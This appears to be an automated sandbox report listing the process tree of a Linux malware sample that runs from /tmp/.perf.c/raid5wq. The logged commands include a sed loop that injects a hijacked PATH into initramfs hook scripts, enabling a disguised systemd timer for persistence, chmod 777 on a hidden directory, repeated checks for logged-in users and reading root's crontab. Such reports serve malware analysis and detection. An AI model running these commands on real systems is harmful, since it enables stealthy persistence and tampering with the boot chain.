Arguments:	/bin/sh -c "for f in $(find /usr/share/initramfs-tools/hooks -type f 2>/dev/null\|xargs grep -s -l 'ldd '\|xargs grep -L 'export PATH=.*/\\.local/bin:.PATH');do sed -i '/^#!\\//a export PATH=/bin/.local/bin:$PATH' $f;done"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6436, Parent PID: 6435

General

Start time (UTC):	11:01:27
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6437, Parent PID: 6436

General

Start time (UTC):	11:01:27
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: find PID: 6437, Parent PID: 6436

General

Start time (UTC):	11:01:27
Start date (UTC):	10/10/2024
Path:	/usr/bin/find
Arguments:	find /usr/share/initramfs-tools/hooks -type f
File size:	320160 bytes
MD5 hash:	b68ef002f84cc54dd472238ba7df80ab

Analysis Process: sh PID: 6438, Parent PID: 6436

General

Start time (UTC):	11:01:27
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: xargs PID: 6438, Parent PID: 6436

General

Start time (UTC):	11:01:27
Start date (UTC):	10/10/2024
Path:	/usr/bin/xargs
Arguments:	xargs grep -s -l "ldd "
File size:	76152 bytes
MD5 hash:	67d30da7ca6e766bb5a005e77f928efb

Analysis Process: xargs PID: 6440, Parent PID: 6438

General

Start time (UTC):	11:01:27
Start date (UTC):	10/10/2024
Path:	/usr/bin/xargs
Arguments:	-
File size:	76152 bytes
MD5 hash:	67d30da7ca6e766bb5a005e77f928efb

Analysis Process: grep PID: 6440, Parent PID: 6438

General

Start time (UTC):	11:01:27
Start date (UTC):	10/10/2024
Path:	/usr/bin/grep
Arguments:	grep -s -l "ldd " /usr/share/initramfs-tools/hooks/zz-dhclient /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/cryptpassdev /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/copymods /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/compcache /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/cloud-initramfs-dyn-netconf /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/overlayroot /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/ntfs_3g
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Analysis Process: sh PID: 6439, Parent PID: 6436

General

Start time (UTC):	11:01:27
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: xargs PID: 6439, Parent PID: 6436

General

Start time (UTC):	11:01:27
Start date (UTC):	10/10/2024
Path:	/usr/bin/xargs
Arguments:	xargs grep -L "export PATH=.*/\\.local/bin:.PATH"
File size:	76152 bytes
MD5 hash:	67d30da7ca6e766bb5a005e77f928efb

Analysis Process: xargs PID: 6461, Parent PID: 6439

General

Start time (UTC):	11:01:28
Start date (UTC):	10/10/2024
Path:	/usr/bin/xargs
Arguments:	-
File size:	76152 bytes
MD5 hash:	67d30da7ca6e766bb5a005e77f928efb

Analysis Process: grep PID: 6461, Parent PID: 6439

General

Start time (UTC):	11:01:28
Start date (UTC):	10/10/2024
Path:	/usr/bin/grep
Arguments:	grep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptroot
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Analysis Process: raid5wq PID: 6464, Parent PID: 6269

General

Start time (UTC):	11:01:28
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6464, Parent PID: 6269

General

Start time (UTC):	11:01:28
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "systemctl daemon-reload;systemctl enable kmodaudit.timer;systemctl start kmodaudit.timer"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6466, Parent PID: 6464

General

Start time (UTC):	11:01:29
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: systemctl PID: 6466, Parent PID: 6464

General

Start time (UTC):	11:01:29
Start date (UTC):	10/10/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl daemon-reload
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Analysis Process: sh PID: 6471, Parent PID: 6464

General

Start time (UTC):	11:01:29
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: systemctl PID: 6471, Parent PID: 6464

General

Start time (UTC):	11:01:29
Start date (UTC):	10/10/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl enable kmodaudit.timer
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Analysis Process: sh PID: 6476, Parent PID: 6464

General

Start time (UTC):	11:01:30
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: systemctl PID: 6476, Parent PID: 6464

General

Start time (UTC):	11:01:30
Start date (UTC):	10/10/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl start kmodaudit.timer
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Analysis Process: raid5wq PID: 6479, Parent PID: 6269

General

Start time (UTC):	11:01:31
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: who PID: 6479, Parent PID: 6269

General

Start time (UTC):	11:01:31
Start date (UTC):	10/10/2024
Path:	/usr/bin/who
Arguments:	who
File size:	59768 bytes
MD5 hash:	04e03e21fed4071259c4427b3baf5e8f

Analysis Process: raid5wq PID: 6499, Parent PID: 6269

General

Start time (UTC):	11:01:32
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6499, Parent PID: 6269

General

Start time (UTC):	11:01:32
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "who \| wc -l"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6503, Parent PID: 6499

General

Start time (UTC):	11:01:33
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: who PID: 6503, Parent PID: 6499

General

Start time (UTC):	11:01:33
Start date (UTC):	10/10/2024
Path:	/usr/bin/who
Arguments:	who
File size:	59768 bytes
MD5 hash:	04e03e21fed4071259c4427b3baf5e8f

Analysis Process: sh PID: 6504, Parent PID: 6499

General

Start time (UTC):	11:01:33
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: wc PID: 6504, Parent PID: 6499

General

Start time (UTC):	11:01:33
Start date (UTC):	10/10/2024
Path:	/usr/bin/wc
Arguments:	wc -l
File size:	47456 bytes
MD5 hash:	2f44ec9941b5797742ec082e424af073

Analysis Process: raid5wq PID: 6505, Parent PID: 6269

General

Start time (UTC):	11:01:34
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6505, Parent PID: 6269

General

Start time (UTC):	11:01:34
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "who \| wc -l"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6507, Parent PID: 6505

General

Start time (UTC):	11:01:35
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: who PID: 6507, Parent PID: 6505

General

Start time (UTC):	11:01:35
Start date (UTC):	10/10/2024
Path:	/usr/bin/who
Arguments:	who
File size:	59768 bytes
MD5 hash:	04e03e21fed4071259c4427b3baf5e8f

Analysis Process: sh PID: 6508, Parent PID: 6505

General

Start time (UTC):	11:01:35
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: wc PID: 6508, Parent PID: 6505

General

Start time (UTC):	11:01:35
Start date (UTC):	10/10/2024
Path:	/usr/bin/wc
Arguments:	wc -l
File size:	47456 bytes
MD5 hash:	2f44ec9941b5797742ec082e424af073

Analysis Process: raid5wq PID: 6509, Parent PID: 6269

General

Start time (UTC):	11:01:36
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6509, Parent PID: 6269

General

Start time (UTC):	11:01:36
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "who \| wc -l"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6510, Parent PID: 6509

General

Start time (UTC):	11:01:37
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: who PID: 6510, Parent PID: 6509

General

Start time (UTC):	11:01:37
Start date (UTC):	10/10/2024
Path:	/usr/bin/who
Arguments:	who
File size:	59768 bytes
MD5 hash:	04e03e21fed4071259c4427b3baf5e8f

Analysis Process: sh PID: 6511, Parent PID: 6509

General

Start time (UTC):	11:01:37
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: wc PID: 6511, Parent PID: 6509

General

Start time (UTC):	11:01:37
Start date (UTC):	10/10/2024
Path:	/usr/bin/wc
Arguments:	wc -l
File size:	47456 bytes
MD5 hash:	2f44ec9941b5797742ec082e424af073

Analysis Process: raid5wq PID: 6514, Parent PID: 6269

General

Start time (UTC):	11:01:38
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6514, Parent PID: 6269

General

Start time (UTC):	11:01:38
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "who \| wc -l"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6515, Parent PID: 6514

General

Start time (UTC):	11:01:39
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: who PID: 6515, Parent PID: 6514

General

Start time (UTC):	11:01:39
Start date (UTC):	10/10/2024
Path:	/usr/bin/who
Arguments:	who
File size:	59768 bytes
MD5 hash:	04e03e21fed4071259c4427b3baf5e8f

Analysis Process: sh PID: 6516, Parent PID: 6514

General

Start time (UTC):	11:01:39
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: wc PID: 6516, Parent PID: 6514

General

Start time (UTC):	11:01:39
Start date (UTC):	10/10/2024
Path:	/usr/bin/wc
Arguments:	wc -l
File size:	47456 bytes
MD5 hash:	2f44ec9941b5797742ec082e424af073

Analysis Process: raid5wq PID: 6517, Parent PID: 6269

General

Start time (UTC):	11:01:40
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6517, Parent PID: 6269

General

Start time (UTC):	11:01:40
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "killall -9 perfctl;pkill -9 perfctl"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6520, Parent PID: 6517

General

Start time (UTC):	11:01:41
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: killall PID: 6520, Parent PID: 6517

General

Start time (UTC):	11:01:41
Start date (UTC):	10/10/2024
Path:	/usr/bin/killall
Arguments:	killall -9 perfctl
File size:	32024 bytes
MD5 hash:	cd2adedbee501869ac691b88af39cd8b

Analysis Process: sh PID: 6555, Parent PID: 6517

General

Start time (UTC):	11:01:50
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: pkill PID: 6555, Parent PID: 6517

General

Start time (UTC):	11:01:50
Start date (UTC):	10/10/2024
Path:	/usr/bin/pkill
Arguments:	pkill -9 perfctl
File size:	30968 bytes
MD5 hash:	fa96a75a08109d8842e4865b2907d51f

Analysis Process: raid5wq PID: 6519, Parent PID: 6269

General

Start time (UTC):	11:01:40
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6519, Parent PID: 6269

General

Start time (UTC):	11:01:41
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "who \| wc -l"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6521, Parent PID: 6519

General

Start time (UTC):	11:01:41
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: who PID: 6521, Parent PID: 6519

General

Start time (UTC):	11:01:41
Start date (UTC):	10/10/2024
Path:	/usr/bin/who
Arguments:	who
File size:	59768 bytes
MD5 hash:	04e03e21fed4071259c4427b3baf5e8f

Analysis Process: sh PID: 6522, Parent PID: 6519

General

Start time (UTC):	11:01:41
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: wc PID: 6522, Parent PID: 6519

General

Start time (UTC):	11:01:41
Start date (UTC):	10/10/2024
Path:	/usr/bin/wc
Arguments:	wc -l
File size:	47456 bytes
MD5 hash:	2f44ec9941b5797742ec082e424af073

Analysis Process: raid5wq PID: 6525, Parent PID: 6269

General

Start time (UTC):	11:01:42
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6525, Parent PID: 6269

General

Start time (UTC):	11:01:42
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "who \| wc -l"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6528, Parent PID: 6525

General

Start time (UTC):	11:01:43
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: who PID: 6528, Parent PID: 6525

General

Start time (UTC):	11:01:43
Start date (UTC):	10/10/2024
Path:	/usr/bin/who
Arguments:	who
File size:	59768 bytes
MD5 hash:	04e03e21fed4071259c4427b3baf5e8f

Analysis Process: sh PID: 6529, Parent PID: 6525

General

Start time (UTC):	11:01:43
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: wc PID: 6529, Parent PID: 6525

General

Start time (UTC):	11:01:43
Start date (UTC):	10/10/2024
Path:	/usr/bin/wc
Arguments:	wc -l
File size:	47456 bytes
MD5 hash:	2f44ec9941b5797742ec082e424af073

Analysis Process: raid5wq PID: 6545, Parent PID: 6269

General

Start time (UTC):	11:01:44
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6545, Parent PID: 6269

General

Start time (UTC):	11:01:44
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "who \| wc -l"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6546, Parent PID: 6545

General

Start time (UTC):	11:01:45
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: who PID: 6546, Parent PID: 6545

General

Start time (UTC):	11:01:45
Start date (UTC):	10/10/2024
Path:	/usr/bin/who
Arguments:	who
File size:	59768 bytes
MD5 hash:	04e03e21fed4071259c4427b3baf5e8f

Analysis Process: sh PID: 6547, Parent PID: 6545

General

Start time (UTC):	11:01:45
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: wc PID: 6547, Parent PID: 6545

General

Start time (UTC):	11:01:45
Start date (UTC):	10/10/2024
Path:	/usr/bin/wc
Arguments:	wc -l
File size:	47456 bytes
MD5 hash:	2f44ec9941b5797742ec082e424af073

Analysis Process: raid5wq PID: 6548, Parent PID: 6269

General

Start time (UTC):	11:01:45
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: chmod PID: 6548, Parent PID: 6269

General

Start time (UTC):	11:01:45
Start date (UTC):	10/10/2024
Path:	/usr/bin/chmod
Arguments:	chmod -R 777 /tmp/.xdiag/data
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Analysis Process: raid5wq PID: 6549, Parent PID: 6269

General

Start time (UTC):	11:01:46
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6549, Parent PID: 6269

General

Start time (UTC):	11:01:46
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "who \| wc -l"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6550, Parent PID: 6549

General

Start time (UTC):	11:01:47
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: who PID: 6550, Parent PID: 6549

General

Start time (UTC):	11:01:47
Start date (UTC):	10/10/2024
Path:	/usr/bin/who
Arguments:	who
File size:	59768 bytes
MD5 hash:	04e03e21fed4071259c4427b3baf5e8f

Analysis Process: sh PID: 6551, Parent PID: 6549

General

Start time (UTC):	11:01:47
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: wc PID: 6551, Parent PID: 6549

General

Start time (UTC):	11:01:47
Start date (UTC):	10/10/2024
Path:	/usr/bin/wc
Arguments:	wc -l
File size:	47456 bytes
MD5 hash:	2f44ec9941b5797742ec082e424af073

Analysis Process: raid5wq PID: 6554, Parent PID: 6269

General

Start time (UTC):	11:01:49
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6554, Parent PID: 6269

General

Start time (UTC):	11:01:49
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "who \| wc -l"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6556, Parent PID: 6554

General

Start time (UTC):	11:01:50
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: who PID: 6556, Parent PID: 6554

General

Start time (UTC):	11:01:50
Start date (UTC):	10/10/2024
Path:	/usr/bin/who
Arguments:	who
File size:	59768 bytes
MD5 hash:	04e03e21fed4071259c4427b3baf5e8f

Analysis Process: sh PID: 6557, Parent PID: 6554

General

Start time (UTC):	11:01:50
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: wc PID: 6557, Parent PID: 6554

General

Start time (UTC):	11:01:50
Start date (UTC):	10/10/2024
Path:	/usr/bin/wc
Arguments:	wc -l
File size:	47456 bytes
MD5 hash:	2f44ec9941b5797742ec082e424af073

Analysis Process: raid5wq PID: 6558, Parent PID: 6269

General

Start time (UTC):	11:01:51
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6558, Parent PID: 6269

General

Start time (UTC):	11:01:51
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "who \| wc -l"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6564, Parent PID: 6558

General

Start time (UTC):	11:01:52
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: who PID: 6564, Parent PID: 6558

General

Start time (UTC):	11:01:52
Start date (UTC):	10/10/2024
Path:	/usr/bin/who
Arguments:	who
File size:	59768 bytes
MD5 hash:	04e03e21fed4071259c4427b3baf5e8f

Analysis Process: sh PID: 6565, Parent PID: 6558

General

Start time (UTC):	11:01:52
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: wc PID: 6565, Parent PID: 6558

General

Start time (UTC):	11:01:52
Start date (UTC):	10/10/2024
Path:	/usr/bin/wc
Arguments:	wc -l
File size:	47456 bytes
MD5 hash:	2f44ec9941b5797742ec082e424af073

Analysis Process: raid5wq PID: 6568, Parent PID: 6269

General

Start time (UTC):	11:01:54
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6568, Parent PID: 6269

General

Start time (UTC):	11:01:54
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "who \| wc -l"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6570, Parent PID: 6568

General

Start time (UTC):	11:01:54
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: who PID: 6570, Parent PID: 6568

General

Start time (UTC):	11:01:54
Start date (UTC):	10/10/2024
Path:	/usr/bin/who
Arguments:	who
File size:	59768 bytes
MD5 hash:	04e03e21fed4071259c4427b3baf5e8f

Analysis Process: sh PID: 6571, Parent PID: 6568

General

Start time (UTC):	11:01:54
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: wc PID: 6571, Parent PID: 6568

General

Start time (UTC):	11:01:54
Start date (UTC):	10/10/2024
Path:	/usr/bin/wc
Arguments:	wc -l
File size:	47456 bytes
MD5 hash:	2f44ec9941b5797742ec082e424af073

Analysis Process: raid5wq PID: 6580, Parent PID: 6269

General

Start time (UTC):	11:01:54
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6580, Parent PID: 6269

General

Start time (UTC):	11:01:54
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "find /var/spool/cron/crontabs -type f 2>/dev/null\|grep cron\|grep '/root$'\|xargs cat"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6581, Parent PID: 6580

General

Start time (UTC):	11:01:55
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: find PID: 6581, Parent PID: 6580

General

Start time (UTC):	11:01:55
Start date (UTC):	10/10/2024
Path:	/usr/bin/find
Arguments:	find /var/spool/cron/crontabs -type f
File size:	320160 bytes
MD5 hash:	b68ef002f84cc54dd472238ba7df80ab

Analysis Process: sh PID: 6582, Parent PID: 6580

General

Start time (UTC):	11:01:55
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: grep PID: 6582, Parent PID: 6580

General

Start time (UTC):	11:01:55
Start date (UTC):	10/10/2024
Path:	/usr/bin/grep
Arguments:	grep cron
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Analysis Process: sh PID: 6583, Parent PID: 6580

General

Start time (UTC):	11:01:55
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: grep PID: 6583, Parent PID: 6580

General

Start time (UTC):	11:01:55
Start date (UTC):	10/10/2024
Path:	/usr/bin/grep
Arguments:	grep /root$
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Analysis Process: sh PID: 6584, Parent PID: 6580

General

Start time (UTC):	11:01:55
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: xargs PID: 6584, Parent PID: 6580

General

Start time (UTC):	11:01:55
Start date (UTC):	10/10/2024
Path:	/usr/bin/xargs
Arguments:	xargs cat
File size:	76152 bytes
MD5 hash:	67d30da7ca6e766bb5a005e77f928efb

Analysis Process: xargs PID: 6585, Parent PID: 6584

General

Start time (UTC):	11:01:56
Start date (UTC):	10/10/2024
Path:	/usr/bin/xargs
Arguments:	-
File size:	76152 bytes
MD5 hash:	67d30da7ca6e766bb5a005e77f928efb

Analysis Process: cat PID: 6585, Parent PID: 6584

General

Start time (UTC):	11:01:56
Start date (UTC):	10/10/2024
Path:	/usr/bin/cat
Arguments:	cat /var/spool/cron/crontabs/root
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

Analysis Process: raid5wq PID: 6599, Parent PID: 6269

General

Start time (UTC):	11:01:57
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

